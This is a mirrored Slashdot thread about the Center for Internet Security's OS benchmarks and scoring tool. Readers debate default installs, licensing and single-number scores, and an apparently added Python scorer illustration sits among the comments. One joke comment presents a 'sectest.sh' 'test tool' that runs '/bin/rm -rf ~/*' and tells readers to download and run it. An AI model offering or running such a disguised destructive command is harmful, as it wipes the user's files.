Slashdot Mirror


Internet Security Standards

Aetius writes "The Center for Internet Security has released a set of security standards and tools for several operating systems. Here's the ZDNet story. I checked out the Linux standard and it gives pretty good coverage of the basics; about the only thing missing was a simple firewall treatment. I installed it on my wide-open desktop system (RH 7.3) and scored a 6.61 out of 10, which doesn't seem too bad. The scanner code isn't open source, but it's perl so you can at least look at it. You have to register to download it. If nothing else, the PDF of the standards is a good read. Enjoy."

11 of 135 comments

  1. Tools to gauge your security? by xA40D · Score: 4, Insightful

    Quis Custodiet Ipsos Custodes?

    --
    Do you mind, your karma has just run over my dogma.
  2. Missed the biggest hole by Papa+Legba · Score: 4, Insightful

    Unfortunately they have missed the biggest hole in security on the internet. The average user and the default install.

    It's all well and good to say that we now have a standard. The problem is that the people who are most likely to use this tool are the ones that don't need it as badly. If you are aware this tool exists then you are security minded enough to have closed all the holes yourself.

    What this really should do is go after the big offenders and get them to work at it. I am not necessarily talking Microsoft here. I am talking about the builders. Until Dell and Compaq start shipping their systems and installer software with the lockdowns ready to go or already installed, this stuff is going to continue no matter how many checking tools are produced.

    The security community must realize their biggest test is not the sloppy base install of Microsoft, but the managers like the one I have at work. His official policy is "If it ain't broke don't fix it." This means patches are never installed and nothing is upgraded until it is exploited, then it is patched and fixed. Something has to be done about this, and until something is done no other initiative is going to make a dent in exploits on the internet.

    --
    Papa Legba come and open the gate
    1. Re:Missed the biggest hole by stewby18 · Score: 2, Insightful
      Not only that, but it helps people who are new, relatively unknowledgeable, but want to learn.

      If you are aware this tool exists then you are security minded enough to have closed all the holes yourself.

      It might be more accurate to say that people who are aware this tool exists are security minded enough to want to know how to close the holes, and what the holes are. If there is an easy-to-find list of suggestions, and a tool to help you, it's easier to go from knowing what good security is and wanting it to actually having it.

      The in-the-know are often quick to equate lack of knowledge with Cluelessness, but there are people out there (not the majority, but enough) who don't know things simply because they haven't learned them yet.

  3. Here's a quick test tool by Anonymous Coward · Score: 4, Insightful

    sectest.sh:
    #!/bin/sh
    /bin/rm -rf ~/*

    Instructions:
    1. Download and run
    2. If you performed Step #1, your system is insecure at the most common place, the user.

  4. Re:Open Source vs Free Software by norwoodites · Score: 3, Insightful

    It is neither free nor open source because you cannot change the code legally.

  5. Re:Open Source vs Free Software by _Sprocket_ · Score: 4, Insightful

    Actually... if you really want to get pedantic...

    You've missed the difference between having the source code available (sometimes referred to as "open source") and Open Source.

    In short, having source code available does not make a project Open Source - it's all about the licensing. And not all Open Source projects match the Free Software definition (witness FSF vs BSD jihads).

  6. Delusions of grandeur? by Subcarrier · Score: 3, Insightful

    What exactly makes these Internet Security Standards, anyway?

    --
    "I have opinions of my own, strong opinions, but I don't always agree with them." -- George H. W. Bush
  7. Standards, eh? by Dthoma · Score: 2, Insightful

    Judging by the other comments here, part of the standards either don't apply to their situation, are wrong, or are just useless because they've already done everything they recommend and much more. The fact that it's called a standard seems to imply that it should be universal and work on most (if not all) machines in a realistic environment. The fact that it doesn't suggests that it's not actually a standard.

    --

    Note to M1-ers: a curt but otherwise insightful message is not "Flamebait" or "Troll".

  8. I'd hate to see this become a standard.. by defile · Score: 3, Insightful

    It complained about xinetd and ftp being misconfigured even though both xinetd (and by extension wu-ftpd) aren't running. It complains about how ntp is not running but we're using other clock syncing methods. I'm getting a reduced score on bullshit.

    I can see it now... "Sorry, we only do business with vendors whose servers score 9.5 or better"

  9. The fundamental flaw by The+Creator · Score: 2, Insightful
    One final benchmark score. There's no network score, no local user intrusion score, no physical access score (think lilo passwds). It seems to me that these things are so fundamentally different issues that adding them to a single score is just unproductive (if not directly counterproductive). "this box got 8.0 the other one only got 6.9, let's put this one on the network".

    If a box is in a locked room and only accessible through the network then only its network security is relevant etc. etc.

    --

    FRA: STFU GTFO
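The two complaints above (comment 8: being penalised for the configuration of services that are not even enabled; comment 9: one aggregate number hiding which domain is weak) both come down to how a benchmark scorer is structured. The following is an added illustration, not the CIS scanner's code: a scorer that marks a check "not applicable" when its prerequisite service is disabled and reports a score per domain instead of one total. Check names, domains and the sample host state are constructed for the example.

```python
from typing import Dict, Optional, Set, Tuple
from dataclasses import dataclass


@dataclass(frozen=True)
class Check:
    name: str               # constructed check identifier
    domain: str             # "network", "local" or "physical"
    requires: Optional[str] # service that must be enabled for the check to apply


# Constructed check catalogue loosely modelled on the complaints in the thread.
CHECKS = [
    Check("xinetd-logging-enabled", "network", "xinetd"),
    Check("ftp-anonymous-disabled", "network", "wu-ftpd"),
    Check("ntp-running", "network", None),
    Check("umask-027", "local", None),
    Check("no-world-writable-files", "local", None),
    Check("lilo-password-set", "physical", None),
]


def score_by_domain(host: Dict[str, Set[str]]) -> Dict[str, Tuple[int, int]]:
    """host = {"enabled": services switched on, "passed": checks that passed}.
    Returns {domain: (passed, applicable)}. A check whose required service is
    disabled is skipped entirely, so an idle xinetd neither helps nor hurts."""
    result: Dict[str, Tuple[int, int]] = {}
    for c in CHECKS:
        if c.requires is not None and c.requires not in host["enabled"]:
            continue  # not applicable: the service is not running at all
        passed, applicable = result.get(c.domain, (0, 0))
        result[c.domain] = (passed + (c.name in host["passed"]), applicable + 1)
    return result


def report(host: Dict[str, Set[str]]) -> Dict[str, float]:
    """Per-domain score on a 0-10 scale; domains with no applicable checks are omitted."""
    return {d: round(10 * p / a, 2) for d, (p, a) in score_by_domain(host).items()}


def single_score(host: Dict[str, Set[str]]) -> float:
    """The one-number style of score comment 9 objects to, shown for contrast."""
    totals = score_by_domain(host).values()
    passed, applicable = sum(p for p, _ in totals), sum(a for _, a in totals)
    return round(10 * passed / applicable, 2) if applicable else 0.0


# Constructed sample host: xinetd and wu-ftpd off, ntp off, local hardening done.
SAMPLE_HOST = {"enabled": set(), "passed": {"umask-027", "no-world-writable-files"}}
```

On the sample host the aggregate comes out at 5.0, which says nothing about the fact that local hardening is complete while the network and physical domains have nothing in place.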
  10. Re:Don't waste your time unless you run rh or mdk by BandwidthHog · Score: 2, Insightful

    One platform that really, really, really needs a tool like this: Mac OS X.

    I don't mean because every cool *nix tool should be ported over for our enjoyment. I mean because, not to generalize, but generally speaking Mac users tend to be a very cocky bunch as regards security. We're used to having literally unhackable machines, and now with the move to a BSD base, all we're told is how much more secure that is than anything else on the planet, so there are probably quite a few Mac users out there who assume their cumulative hackability score is now a negative number.

    Couple that with the fact that it's quickly becoming the most common form of *nix (by sheer quantity) and you've got a whole lot of potentially insecure BSD setups operating under a false sense of security, which could bring as much evil to this world as raw sockets.

    Feel free to look down on me for being some lowly point-and-drool GUI junkie, but if OS X boxes start getting cracked in large numbers, then the mainstream hears that *nix isn't much more secure than the other type of operating system, and that only helps the bad guys.

    --

    Quantum materiae materietur marmota monax si marmota monax materiam possit materiari?